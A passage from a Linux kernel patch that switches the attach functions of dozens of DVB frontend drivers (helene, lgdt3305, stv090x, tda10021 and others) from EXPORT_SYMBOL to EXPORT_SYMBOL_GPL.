++++ b/drivers/media/dvb-frontends/ec100.c
+@@ -299,7 +299,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(ec100_attach);
++EXPORT_SYMBOL_GPL(ec100_attach);
+ 
+ static const struct dvb_frontend_ops ec100_ops = {
+ 	.delsys = { SYS_DVBT },
+diff --git a/drivers/media/dvb-frontends/helene.c b/drivers/media/dvb-frontends/helene.c
+index 8c1310c6b0bc2..c299d31dc7d27 100644
+--- a/drivers/media/dvb-frontends/helene.c
++++ b/drivers/media/dvb-frontends/helene.c
+@@ -1025,7 +1025,7 @@ struct dvb_frontend *helene_attach_s(struct dvb_frontend *fe,
+ 			priv->i2c_address, priv->i2c);
+ 	return fe;
+ }
+-EXPORT_SYMBOL(helene_attach_s);
++EXPORT_SYMBOL_GPL(helene_attach_s);
+ 
+ struct dvb_frontend *helene_attach(struct dvb_frontend *fe,
+ 		const struct helene_config *config,
+@@ -1061,7 +1061,7 @@ struct dvb_frontend *helene_attach(struct dvb_frontend *fe,
+ 			priv->i2c_address, priv->i2c);
+ 	return fe;
+ }
+-EXPORT_SYMBOL(helene_attach);
++EXPORT_SYMBOL_GPL(helene_attach);
+ 
+ static int helene_probe(struct i2c_client *client,
+ 			const struct i2c_device_id *id)
+diff --git a/drivers/media/dvb-frontends/horus3a.c b/drivers/media/dvb-frontends/horus3a.c
+index 24bf5cbcc1846..0330b78a5b3f2 100644
+--- a/drivers/media/dvb-frontends/horus3a.c
++++ b/drivers/media/dvb-frontends/horus3a.c
+@@ -395,7 +395,7 @@ struct dvb_frontend *horus3a_attach(struct dvb_frontend *fe,
+ 		priv->i2c_address, priv->i2c);
+ 	return fe;
+ }
+-EXPORT_SYMBOL(horus3a_attach);
++EXPORT_SYMBOL_GPL(horus3a_attach);
+ 
+ MODULE_DESCRIPTION("Sony HORUS3A satellite tuner driver");
+ MODULE_AUTHOR("Sergey Kozlov <serjk@netup.ru>");
+diff --git a/drivers/media/dvb-frontends/isl6405.c b/drivers/media/dvb-frontends/isl6405.c
+index 2cd69b4ff82cb..7d28a743f97eb 100644
+--- a/drivers/media/dvb-frontends/isl6405.c
++++ b/drivers/media/dvb-frontends/isl6405.c
+@@ -141,7 +141,7 @@ struct dvb_frontend *isl6405_attach(struct dvb_frontend *fe, struct i2c_adapter
+ 
+ 	return fe;
+ }
+-EXPORT_SYMBOL(isl6405_attach);
++EXPORT_SYMBOL_GPL(isl6405_attach);
+ 
+ MODULE_DESCRIPTION("Driver for lnb supply and control ic isl6405");
+ MODULE_AUTHOR("Hartmut Hackmann & Oliver Endriss");
+diff --git a/drivers/media/dvb-frontends/isl6421.c b/drivers/media/dvb-frontends/isl6421.c
+index 43b0dfc6f453e..2e9f6f12f849e 100644
+--- a/drivers/media/dvb-frontends/isl6421.c
++++ b/drivers/media/dvb-frontends/isl6421.c
+@@ -213,7 +213,7 @@ struct dvb_frontend *isl6421_attach(struct dvb_frontend *fe, struct i2c_adapter
+ 
+ 	return fe;
+ }
+-EXPORT_SYMBOL(isl6421_attach);
++EXPORT_SYMBOL_GPL(isl6421_attach);
+ 
+ MODULE_DESCRIPTION("Driver for lnb supply and control ic isl6421");
+ MODULE_AUTHOR("Andrew de Quincey & Oliver Endriss");
+diff --git a/drivers/media/dvb-frontends/isl6423.c b/drivers/media/dvb-frontends/isl6423.c
+index 8cd1bb88ce6e7..a0d0a38340574 100644
+--- a/drivers/media/dvb-frontends/isl6423.c
++++ b/drivers/media/dvb-frontends/isl6423.c
+@@ -289,7 +289,7 @@ exit:
+ 	fe->sec_priv = NULL;
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(isl6423_attach);
++EXPORT_SYMBOL_GPL(isl6423_attach);
+ 
+ MODULE_DESCRIPTION("ISL6423 SEC");
+ MODULE_AUTHOR("Manu Abraham");
+diff --git a/drivers/media/dvb-frontends/itd1000.c b/drivers/media/dvb-frontends/itd1000.c
+index 1b33478653d16..f8f362f50e78d 100644
+--- a/drivers/media/dvb-frontends/itd1000.c
++++ b/drivers/media/dvb-frontends/itd1000.c
+@@ -389,7 +389,7 @@ struct dvb_frontend *itd1000_attach(struct dvb_frontend *fe, struct i2c_adapter
+ 
+ 	return fe;
+ }
+-EXPORT_SYMBOL(itd1000_attach);
++EXPORT_SYMBOL_GPL(itd1000_attach);
+ 
+ MODULE_AUTHOR("Patrick Boettcher <pb@linuxtv.org>");
+ MODULE_DESCRIPTION("Integrant ITD1000 driver");
+diff --git a/drivers/media/dvb-frontends/ix2505v.c b/drivers/media/dvb-frontends/ix2505v.c
+index 73f27105c139d..3212e333d472b 100644
+--- a/drivers/media/dvb-frontends/ix2505v.c
++++ b/drivers/media/dvb-frontends/ix2505v.c
+@@ -302,7 +302,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(ix2505v_attach);
++EXPORT_SYMBOL_GPL(ix2505v_attach);
+ 
+ module_param_named(debug, ix2505v_debug, int, 0644);
+ MODULE_PARM_DESC(debug, "Turn on/off frontend debugging (default:off).");
+diff --git a/drivers/media/dvb-frontends/l64781.c b/drivers/media/dvb-frontends/l64781.c
+index c5106a1ea1cd0..fe5af2453d559 100644
+--- a/drivers/media/dvb-frontends/l64781.c
++++ b/drivers/media/dvb-frontends/l64781.c
+@@ -593,4 +593,4 @@ MODULE_DESCRIPTION("LSI L64781 DVB-T Demodulator driver");
+ MODULE_AUTHOR("Holger Waechtler, Marko Kohtala");
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(l64781_attach);
++EXPORT_SYMBOL_GPL(l64781_attach);
+diff --git a/drivers/media/dvb-frontends/lg2160.c b/drivers/media/dvb-frontends/lg2160.c
+index f343066c297e2..fe700aa56bff3 100644
+--- a/drivers/media/dvb-frontends/lg2160.c
++++ b/drivers/media/dvb-frontends/lg2160.c
+@@ -1426,7 +1426,7 @@ struct dvb_frontend *lg2160_attach(const struct lg2160_config *config,
+ 
+ 	return &state->frontend;
+ }
+-EXPORT_SYMBOL(lg2160_attach);
++EXPORT_SYMBOL_GPL(lg2160_attach);
+ 
+ MODULE_DESCRIPTION("LG Electronics LG216x ATSC/MH Demodulator Driver");
+ MODULE_AUTHOR("Michael Krufky <mkrufky@linuxtv.org>");
+diff --git a/drivers/media/dvb-frontends/lgdt3305.c b/drivers/media/dvb-frontends/lgdt3305.c
+index 62d7439889196..60a97f1cc74e5 100644
+--- a/drivers/media/dvb-frontends/lgdt3305.c
++++ b/drivers/media/dvb-frontends/lgdt3305.c
+@@ -1148,7 +1148,7 @@ fail:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(lgdt3305_attach);
++EXPORT_SYMBOL_GPL(lgdt3305_attach);
+ 
+ static const struct dvb_frontend_ops lgdt3304_ops = {
+ 	.delsys = { SYS_ATSC, SYS_DVBC_ANNEX_B },
+diff --git a/drivers/media/dvb-frontends/lgdt3306a.c b/drivers/media/dvb-frontends/lgdt3306a.c
+index 424311afb2bfa..6dfa8b18ed671 100644
+--- a/drivers/media/dvb-frontends/lgdt3306a.c
++++ b/drivers/media/dvb-frontends/lgdt3306a.c
+@@ -1859,7 +1859,7 @@ fail:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(lgdt3306a_attach);
++EXPORT_SYMBOL_GPL(lgdt3306a_attach);
+ 
+ #ifdef DBG_DUMP
+ 
+diff --git a/drivers/media/dvb-frontends/lgdt330x.c b/drivers/media/dvb-frontends/lgdt330x.c
+index ea9ae22fd2016..cb07869ea2fb3 100644
+--- a/drivers/media/dvb-frontends/lgdt330x.c
++++ b/drivers/media/dvb-frontends/lgdt330x.c
+@@ -928,7 +928,7 @@ struct dvb_frontend *lgdt330x_attach(const struct lgdt330x_config *_config,
+ 
+ 	return lgdt330x_get_dvb_frontend(client);
+ }
+-EXPORT_SYMBOL(lgdt330x_attach);
++EXPORT_SYMBOL_GPL(lgdt330x_attach);
+ 
+ static const struct dvb_frontend_ops lgdt3302_ops = {
+ 	.delsys = { SYS_ATSC, SYS_DVBC_ANNEX_B },
+diff --git a/drivers/media/dvb-frontends/lgs8gxx.c b/drivers/media/dvb-frontends/lgs8gxx.c
+index 30014979b985b..ffaf60e16ecd4 100644
+--- a/drivers/media/dvb-frontends/lgs8gxx.c
++++ b/drivers/media/dvb-frontends/lgs8gxx.c
+@@ -1043,7 +1043,7 @@ error_out:
+ 	return NULL;
+ 
+ }
+-EXPORT_SYMBOL(lgs8gxx_attach);
++EXPORT_SYMBOL_GPL(lgs8gxx_attach);
+ 
+ MODULE_DESCRIPTION("Legend Silicon LGS8913/LGS8GXX DMB-TH demodulator driver");
+ MODULE_AUTHOR("David T. L. Wong <davidtlwong@gmail.com>");
+diff --git a/drivers/media/dvb-frontends/lnbh25.c b/drivers/media/dvb-frontends/lnbh25.c
+index 9ffe06cd787dd..41bec050642b5 100644
+--- a/drivers/media/dvb-frontends/lnbh25.c
++++ b/drivers/media/dvb-frontends/lnbh25.c
+@@ -173,7 +173,7 @@ struct dvb_frontend *lnbh25_attach(struct dvb_frontend *fe,
+ 		__func__, priv->i2c_address);
+ 	return fe;
+ }
+-EXPORT_SYMBOL(lnbh25_attach);
++EXPORT_SYMBOL_GPL(lnbh25_attach);
+ 
+ MODULE_DESCRIPTION("ST LNBH25 driver");
+ MODULE_AUTHOR("info@netup.ru");
+diff --git a/drivers/media/dvb-frontends/lnbp21.c b/drivers/media/dvb-frontends/lnbp21.c
+index e564974162d65..32593b1f75a38 100644
+--- a/drivers/media/dvb-frontends/lnbp21.c
++++ b/drivers/media/dvb-frontends/lnbp21.c
+@@ -155,7 +155,7 @@ struct dvb_frontend *lnbh24_attach(struct dvb_frontend *fe,
+ 	return lnbx2x_attach(fe, i2c, override_set, override_clear,
+ 							i2c_addr, LNBH24_TTX);
+ }
+-EXPORT_SYMBOL(lnbh24_attach);
++EXPORT_SYMBOL_GPL(lnbh24_attach);
+ 
+ struct dvb_frontend *lnbp21_attach(struct dvb_frontend *fe,
+ 				struct i2c_adapter *i2c, u8 override_set,
+@@ -164,7 +164,7 @@ struct dvb_frontend *lnbp21_attach(struct dvb_frontend *fe,
+ 	return lnbx2x_attach(fe, i2c, override_set, override_clear,
+ 							0x08, LNBP21_ISEL);
+ }
+-EXPORT_SYMBOL(lnbp21_attach);
++EXPORT_SYMBOL_GPL(lnbp21_attach);
+ 
+ MODULE_DESCRIPTION("Driver for lnb supply and control ic lnbp21, lnbh24");
+ MODULE_AUTHOR("Oliver Endriss, Igor M. Liplianin");
+diff --git a/drivers/media/dvb-frontends/lnbp22.c b/drivers/media/dvb-frontends/lnbp22.c
+index b8c7145d4cefe..cb4ea5d3fad4a 100644
+--- a/drivers/media/dvb-frontends/lnbp22.c
++++ b/drivers/media/dvb-frontends/lnbp22.c
+@@ -125,7 +125,7 @@ struct dvb_frontend *lnbp22_attach(struct dvb_frontend *fe,
+ 
+ 	return fe;
+ }
+-EXPORT_SYMBOL(lnbp22_attach);
++EXPORT_SYMBOL_GPL(lnbp22_attach);
+ 
+ MODULE_DESCRIPTION("Driver for lnb supply and control ic lnbp22");
+ MODULE_AUTHOR("Dominik Kuhlen");
+diff --git a/drivers/media/dvb-frontends/m88ds3103.c b/drivers/media/dvb-frontends/m88ds3103.c
+index 4e844b2ef5971..9a0d43c7ba9e0 100644
+--- a/drivers/media/dvb-frontends/m88ds3103.c
++++ b/drivers/media/dvb-frontends/m88ds3103.c
+@@ -1695,7 +1695,7 @@ struct dvb_frontend *m88ds3103_attach(const struct m88ds3103_config *cfg,
+ 	*tuner_i2c_adapter = pdata.get_i2c_adapter(client);
+ 	return pdata.get_dvb_frontend(client);
+ }
+-EXPORT_SYMBOL(m88ds3103_attach);
++EXPORT_SYMBOL_GPL(m88ds3103_attach);
+ 
+ static const struct dvb_frontend_ops m88ds3103_ops = {
+ 	.delsys = {SYS_DVBS, SYS_DVBS2},
+diff --git a/drivers/media/dvb-frontends/m88rs2000.c b/drivers/media/dvb-frontends/m88rs2000.c
+index b294ba87e934f..2aa98203cd659 100644
+--- a/drivers/media/dvb-frontends/m88rs2000.c
++++ b/drivers/media/dvb-frontends/m88rs2000.c
+@@ -808,7 +808,7 @@ error:
+ 
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(m88rs2000_attach);
++EXPORT_SYMBOL_GPL(m88rs2000_attach);
+ 
+ MODULE_DESCRIPTION("M88RS2000 DVB-S Demodulator driver");
+ MODULE_AUTHOR("Malcolm Priestley tvboxspy@gmail.com");
+diff --git a/drivers/media/dvb-frontends/mb86a16.c b/drivers/media/dvb-frontends/mb86a16.c
+index 2505f1e5794e7..ed08e0c2cf512 100644
+--- a/drivers/media/dvb-frontends/mb86a16.c
++++ b/drivers/media/dvb-frontends/mb86a16.c
+@@ -1848,6 +1848,6 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(mb86a16_attach);
++EXPORT_SYMBOL_GPL(mb86a16_attach);
+ MODULE_LICENSE("GPL");
+ MODULE_AUTHOR("Manu Abraham");
+diff --git a/drivers/media/dvb-frontends/mb86a20s.c b/drivers/media/dvb-frontends/mb86a20s.c
+index b74b9afed9a2e..9f5c61d4f23c5 100644
+--- a/drivers/media/dvb-frontends/mb86a20s.c
++++ b/drivers/media/dvb-frontends/mb86a20s.c
+@@ -2081,7 +2081,7 @@ struct dvb_frontend *mb86a20s_attach(const struct mb86a20s_config *config,
+ 	dev_info(&i2c->dev, "Detected a Fujitsu mb86a20s frontend\n");
+ 	return &state->frontend;
+ }
+-EXPORT_SYMBOL(mb86a20s_attach);
++EXPORT_SYMBOL_GPL(mb86a20s_attach);
+ 
+ static const struct dvb_frontend_ops mb86a20s_ops = {
+ 	.delsys = { SYS_ISDBT },
+diff --git a/drivers/media/dvb-frontends/mt312.c b/drivers/media/dvb-frontends/mt312.c
+index d43a67045dbe7..fb867dd8a26be 100644
+--- a/drivers/media/dvb-frontends/mt312.c
++++ b/drivers/media/dvb-frontends/mt312.c
+@@ -827,7 +827,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(mt312_attach);
++EXPORT_SYMBOL_GPL(mt312_attach);
+ 
+ module_param(debug, int, 0644);
+ MODULE_PARM_DESC(debug, "Turn on/off frontend debugging (default:off).");
+diff --git a/drivers/media/dvb-frontends/mt352.c b/drivers/media/dvb-frontends/mt352.c
+index 399d5c519027e..1b2889f5cf67d 100644
+--- a/drivers/media/dvb-frontends/mt352.c
++++ b/drivers/media/dvb-frontends/mt352.c
+@@ -593,4 +593,4 @@ MODULE_DESCRIPTION("Zarlink MT352 DVB-T Demodulator driver");
+ MODULE_AUTHOR("Holger Waechtler, Daniel Mack, Antonio Mancuso");
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(mt352_attach);
++EXPORT_SYMBOL_GPL(mt352_attach);
+diff --git a/drivers/media/dvb-frontends/nxt200x.c b/drivers/media/dvb-frontends/nxt200x.c
+index 200b6dbc75f81..1c549ada6ebf9 100644
+--- a/drivers/media/dvb-frontends/nxt200x.c
++++ b/drivers/media/dvb-frontends/nxt200x.c
+@@ -1216,5 +1216,5 @@ MODULE_DESCRIPTION("NXT200X (ATSC 8VSB & ITU-T J.83 AnnexB 64/256 QAM) Demodulat
+ MODULE_AUTHOR("Kirk Lapray, Michael Krufky, Jean-Francois Thibert, and Taylor Jacob");
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(nxt200x_attach);
++EXPORT_SYMBOL_GPL(nxt200x_attach);
+ 
+diff --git a/drivers/media/dvb-frontends/nxt6000.c b/drivers/media/dvb-frontends/nxt6000.c
+index 136918f82dda0..e8d4940370ddf 100644
+--- a/drivers/media/dvb-frontends/nxt6000.c
++++ b/drivers/media/dvb-frontends/nxt6000.c
+@@ -621,4 +621,4 @@ MODULE_DESCRIPTION("NxtWave NXT6000 DVB-T demodulator driver");
+ MODULE_AUTHOR("Florian Schirmer");
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(nxt6000_attach);
++EXPORT_SYMBOL_GPL(nxt6000_attach);
+diff --git a/drivers/media/dvb-frontends/or51132.c b/drivers/media/dvb-frontends/or51132.c
+index 24de1b1151583..144a1f25dec0a 100644
+--- a/drivers/media/dvb-frontends/or51132.c
++++ b/drivers/media/dvb-frontends/or51132.c
+@@ -605,4 +605,4 @@ MODULE_AUTHOR("Kirk Lapray");
+ MODULE_AUTHOR("Trent Piepho");
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(or51132_attach);
++EXPORT_SYMBOL_GPL(or51132_attach);
+diff --git a/drivers/media/dvb-frontends/or51211.c b/drivers/media/dvb-frontends/or51211.c
+index ddcaea5c9941f..dc60482162c54 100644
+--- a/drivers/media/dvb-frontends/or51211.c
++++ b/drivers/media/dvb-frontends/or51211.c
+@@ -551,5 +551,5 @@ MODULE_DESCRIPTION("Oren OR51211 VSB [pcHDTV HD-2000] Demodulator Driver");
+ MODULE_AUTHOR("Kirk Lapray");
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(or51211_attach);
++EXPORT_SYMBOL_GPL(or51211_attach);
+ 
+diff --git a/drivers/media/dvb-frontends/s5h1409.c b/drivers/media/dvb-frontends/s5h1409.c
+index 3089cc174a6f5..28b1dca077ead 100644
+--- a/drivers/media/dvb-frontends/s5h1409.c
++++ b/drivers/media/dvb-frontends/s5h1409.c
+@@ -981,7 +981,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(s5h1409_attach);
++EXPORT_SYMBOL_GPL(s5h1409_attach);
+ 
+ static const struct dvb_frontend_ops s5h1409_ops = {
+ 	.delsys = { SYS_ATSC, SYS_DVBC_ANNEX_B },
+diff --git a/drivers/media/dvb-frontends/s5h1411.c b/drivers/media/dvb-frontends/s5h1411.c
+index 2563a72e98b70..fc48e659c2d8a 100644
+--- a/drivers/media/dvb-frontends/s5h1411.c
++++ b/drivers/media/dvb-frontends/s5h1411.c
+@@ -900,7 +900,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(s5h1411_attach);
++EXPORT_SYMBOL_GPL(s5h1411_attach);
+ 
+ static const struct dvb_frontend_ops s5h1411_ops = {
+ 	.delsys = { SYS_ATSC, SYS_DVBC_ANNEX_B },
+diff --git a/drivers/media/dvb-frontends/s5h1420.c b/drivers/media/dvb-frontends/s5h1420.c
+index 6bdec2898bc81..d700de1ea6c24 100644
+--- a/drivers/media/dvb-frontends/s5h1420.c
++++ b/drivers/media/dvb-frontends/s5h1420.c
+@@ -918,7 +918,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(s5h1420_attach);
++EXPORT_SYMBOL_GPL(s5h1420_attach);
+ 
+ static const struct dvb_frontend_ops s5h1420_ops = {
+ 	.delsys = { SYS_DVBS },
+diff --git a/drivers/media/dvb-frontends/s5h1432.c b/drivers/media/dvb-frontends/s5h1432.c
+index 956e8ee4b388e..ff5d3bdf3bc67 100644
+--- a/drivers/media/dvb-frontends/s5h1432.c
++++ b/drivers/media/dvb-frontends/s5h1432.c
+@@ -355,7 +355,7 @@ struct dvb_frontend *s5h1432_attach(const struct s5h1432_config *config,
+ 
+ 	return &state->frontend;
+ }
+-EXPORT_SYMBOL(s5h1432_attach);
++EXPORT_SYMBOL_GPL(s5h1432_attach);
+ 
+ static const struct dvb_frontend_ops s5h1432_ops = {
+ 	.delsys = { SYS_DVBT },
+diff --git a/drivers/media/dvb-frontends/s921.c b/drivers/media/dvb-frontends/s921.c
+index f118d8e641030..7e461ac159fc1 100644
+--- a/drivers/media/dvb-frontends/s921.c
++++ b/drivers/media/dvb-frontends/s921.c
+@@ -495,7 +495,7 @@ struct dvb_frontend *s921_attach(const struct s921_config *config,
+ 
+ 	return &state->frontend;
+ }
+-EXPORT_SYMBOL(s921_attach);
++EXPORT_SYMBOL_GPL(s921_attach);
+ 
+ static const struct dvb_frontend_ops s921_ops = {
+ 	.delsys = { SYS_ISDBT },
+diff --git a/drivers/media/dvb-frontends/si21xx.c b/drivers/media/dvb-frontends/si21xx.c
+index 2d29d2c4d434c..210ccd356e2bf 100644
+--- a/drivers/media/dvb-frontends/si21xx.c
++++ b/drivers/media/dvb-frontends/si21xx.c
+@@ -937,7 +937,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(si21xx_attach);
++EXPORT_SYMBOL_GPL(si21xx_attach);
+ 
+ module_param(debug, int, 0644);
+ MODULE_PARM_DESC(debug, "Turn on/off frontend debugging (default:off).");
+diff --git a/drivers/media/dvb-frontends/sp887x.c b/drivers/media/dvb-frontends/sp887x.c
+index 146e7f2dd3c5e..f59c0f96416b5 100644
+--- a/drivers/media/dvb-frontends/sp887x.c
++++ b/drivers/media/dvb-frontends/sp887x.c
+@@ -624,4 +624,4 @@ MODULE_PARM_DESC(debug, "Turn on/off frontend debugging (default:off).");
+ MODULE_DESCRIPTION("Spase sp887x DVB-T demodulator driver");
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(sp887x_attach);
++EXPORT_SYMBOL_GPL(sp887x_attach);
+diff --git a/drivers/media/dvb-frontends/stb0899_drv.c b/drivers/media/dvb-frontends/stb0899_drv.c
+index 4ee6c1e1e9f7d..2f4d8fb400cd6 100644
+--- a/drivers/media/dvb-frontends/stb0899_drv.c
++++ b/drivers/media/dvb-frontends/stb0899_drv.c
+@@ -1638,7 +1638,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(stb0899_attach);
++EXPORT_SYMBOL_GPL(stb0899_attach);
+ MODULE_PARM_DESC(verbose, "Set Verbosity level");
+ MODULE_AUTHOR("Manu Abraham");
+ MODULE_DESCRIPTION("STB0899 Multi-Std frontend");
+diff --git a/drivers/media/dvb-frontends/stb6000.c b/drivers/media/dvb-frontends/stb6000.c
+index 8c9800d577e03..d74e34677b925 100644
+--- a/drivers/media/dvb-frontends/stb6000.c
++++ b/drivers/media/dvb-frontends/stb6000.c
+@@ -232,7 +232,7 @@ struct dvb_frontend *stb6000_attach(struct dvb_frontend *fe, int addr,
+ 
+ 	return fe;
+ }
+-EXPORT_SYMBOL(stb6000_attach);
++EXPORT_SYMBOL_GPL(stb6000_attach);
+ 
+ module_param(debug, int, 0644);
+ MODULE_PARM_DESC(debug, "Turn on/off frontend debugging (default:off).");
+diff --git a/drivers/media/dvb-frontends/stb6100.c b/drivers/media/dvb-frontends/stb6100.c
+index 698866c4f15a7..c5818a15a0d70 100644
+--- a/drivers/media/dvb-frontends/stb6100.c
++++ b/drivers/media/dvb-frontends/stb6100.c
+@@ -557,7 +557,7 @@ static void stb6100_release(struct dvb_frontend *fe)
+ 	kfree(state);
+ }
+ 
+-EXPORT_SYMBOL(stb6100_attach);
++EXPORT_SYMBOL_GPL(stb6100_attach);
+ MODULE_PARM_DESC(verbose, "Set Verbosity level");
+ 
+ MODULE_AUTHOR("Manu Abraham");
+diff --git a/drivers/media/dvb-frontends/stv0288.c b/drivers/media/dvb-frontends/stv0288.c
+index 3ae1f3a2f1420..a5581bd60f9e8 100644
+--- a/drivers/media/dvb-frontends/stv0288.c
++++ b/drivers/media/dvb-frontends/stv0288.c
+@@ -590,7 +590,7 @@ error:
+ 
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(stv0288_attach);
++EXPORT_SYMBOL_GPL(stv0288_attach);
+ 
+ module_param(debug_legacy_dish_switch, int, 0444);
+ MODULE_PARM_DESC(debug_legacy_dish_switch,
+diff --git a/drivers/media/dvb-frontends/stv0297.c b/drivers/media/dvb-frontends/stv0297.c
+index 6d5962d5697ac..9d4dbd99a5a79 100644
+--- a/drivers/media/dvb-frontends/stv0297.c
++++ b/drivers/media/dvb-frontends/stv0297.c
+@@ -710,4 +710,4 @@ MODULE_DESCRIPTION("ST STV0297 DVB-C Demodulator driver");
+ MODULE_AUTHOR("Dennis Noermann and Andrew de Quincey");
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(stv0297_attach);
++EXPORT_SYMBOL_GPL(stv0297_attach);
+diff --git a/drivers/media/dvb-frontends/stv0299.c b/drivers/media/dvb-frontends/stv0299.c
+index b5263a0ee5aa5..da7ff2c2e8e55 100644
+--- a/drivers/media/dvb-frontends/stv0299.c
++++ b/drivers/media/dvb-frontends/stv0299.c
+@@ -752,4 +752,4 @@ MODULE_DESCRIPTION("ST STV0299 DVB Demodulator driver");
+ MODULE_AUTHOR("Ralph Metzler, Holger Waechtler, Peter Schildmann, Felix Domke, Andreas Oberritter, Andrew de Quincey, Kenneth Aafly");
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(stv0299_attach);
++EXPORT_SYMBOL_GPL(stv0299_attach);
+diff --git a/drivers/media/dvb-frontends/stv0367.c b/drivers/media/dvb-frontends/stv0367.c
+index 95e376f23506f..04556b77c16c9 100644
+--- a/drivers/media/dvb-frontends/stv0367.c
++++ b/drivers/media/dvb-frontends/stv0367.c
+@@ -1750,7 +1750,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(stv0367ter_attach);
++EXPORT_SYMBOL_GPL(stv0367ter_attach);
+ 
+ static int stv0367cab_gate_ctrl(struct dvb_frontend *fe, int enable)
+ {
+@@ -2919,7 +2919,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(stv0367cab_attach);
++EXPORT_SYMBOL_GPL(stv0367cab_attach);
+ 
+ /*
+  * Functions for operation on Digital Devices hardware
+@@ -3340,7 +3340,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(stv0367ddb_attach);
++EXPORT_SYMBOL_GPL(stv0367ddb_attach);
+ 
+ MODULE_PARM_DESC(debug, "Set debug");
+ MODULE_PARM_DESC(i2c_debug, "Set i2c debug");
+diff --git a/drivers/media/dvb-frontends/stv0900_core.c b/drivers/media/dvb-frontends/stv0900_core.c
+index 212312d20ff62..e7b9b9b11d7df 100644
+--- a/drivers/media/dvb-frontends/stv0900_core.c
++++ b/drivers/media/dvb-frontends/stv0900_core.c
+@@ -1957,7 +1957,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(stv0900_attach);
++EXPORT_SYMBOL_GPL(stv0900_attach);
+ 
+ MODULE_PARM_DESC(debug, "Set debug");
+ 
+diff --git a/drivers/media/dvb-frontends/stv090x.c b/drivers/media/dvb-frontends/stv090x.c
+index 0a600c1d7d1b1..aba64162dac45 100644
+--- a/drivers/media/dvb-frontends/stv090x.c
++++ b/drivers/media/dvb-frontends/stv090x.c
+@@ -5072,7 +5072,7 @@ error:
+ 	kfree(state);
+ 	return NULL;
+ }
+-EXPORT_SYMBOL(stv090x_attach);
++EXPORT_SYMBOL_GPL(stv090x_attach);
+ 
+ static const struct i2c_device_id stv090x_id_table[] = {
+ 	{"stv090x", 0},
+diff --git a/drivers/media/dvb-frontends/stv6110.c b/drivers/media/dvb-frontends/stv6110.c
+index 963f6a896102a..1cf9c095dbff0 100644
+--- a/drivers/media/dvb-frontends/stv6110.c
++++ b/drivers/media/dvb-frontends/stv6110.c
+@@ -427,7 +427,7 @@ struct dvb_frontend *stv6110_attach(struct dvb_frontend *fe,
+ 
+ 	return fe;
+ }
+-EXPORT_SYMBOL(stv6110_attach);
++EXPORT_SYMBOL_GPL(stv6110_attach);
+ 
+ module_param(debug, int, 0644);
+ MODULE_PARM_DESC(debug, "Turn on/off frontend debugging (default:off).");
+diff --git a/drivers/media/dvb-frontends/stv6110x.c b/drivers/media/dvb-frontends/stv6110x.c
+index fbc4dbd62151d..6ab2001215917 100644
+--- a/drivers/media/dvb-frontends/stv6110x.c
++++ b/drivers/media/dvb-frontends/stv6110x.c
+@@ -468,7 +468,7 @@ const struct stv6110x_devctl *stv6110x_attach(struct dvb_frontend *fe,
+ 	dev_info(&stv6110x->i2c->dev, "Attaching STV6110x\n");
+ 	return stv6110x->devctl;
+ }
+-EXPORT_SYMBOL(stv6110x_attach);
++EXPORT_SYMBOL_GPL(stv6110x_attach);
+ 
+ static const struct i2c_device_id stv6110x_id_table[] = {
+ 	{"stv6110x", 0},
+diff --git a/drivers/media/dvb-frontends/tda10021.c b/drivers/media/dvb-frontends/tda10021.c
+index faa6e54b33729..462e12ab6bd14 100644
+--- a/drivers/media/dvb-frontends/tda10021.c
++++ b/drivers/media/dvb-frontends/tda10021.c
+@@ -523,4 +523,4 @@ MODULE_DESCRIPTION("Philips TDA10021 DVB-C demodulator driver");
+ MODULE_AUTHOR("Ralph Metzler, Holger Waechtler, Markus Schulz");
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(tda10021_attach);
++EXPORT_SYMBOL_GPL(tda10021_attach);
+diff --git a/drivers/media/dvb-frontends/tda10023.c b/drivers/media/dvb-frontends/tda10023.c
+index 8f32edf6b700e..4c2541ecd7433 100644
+--- a/drivers/media/dvb-frontends/tda10023.c
++++ b/drivers/media/dvb-frontends/tda10023.c
+@@ -594,4 +594,4 @@ MODULE_DESCRIPTION("Philips TDA10023 DVB-C demodulator driver");
+ MODULE_AUTHOR("Georg Acher, Hartmut Birr");
+ MODULE_LICENSE("GPL");
+ 
+-EXPORT_SYMBOL(tda10023_attach);
++EXPORT_SYMBOL_GPL(tda10023_attach);
+diff --git a/drivers/media/dvb-frontends/tda10048.c b/drivers/media/dvb-frontends/tda10048.c
+index 0b3f6999515e3..f6d8a64762b99 100644
+--- a/drivers/media/dvb-frontends/tda10048.c
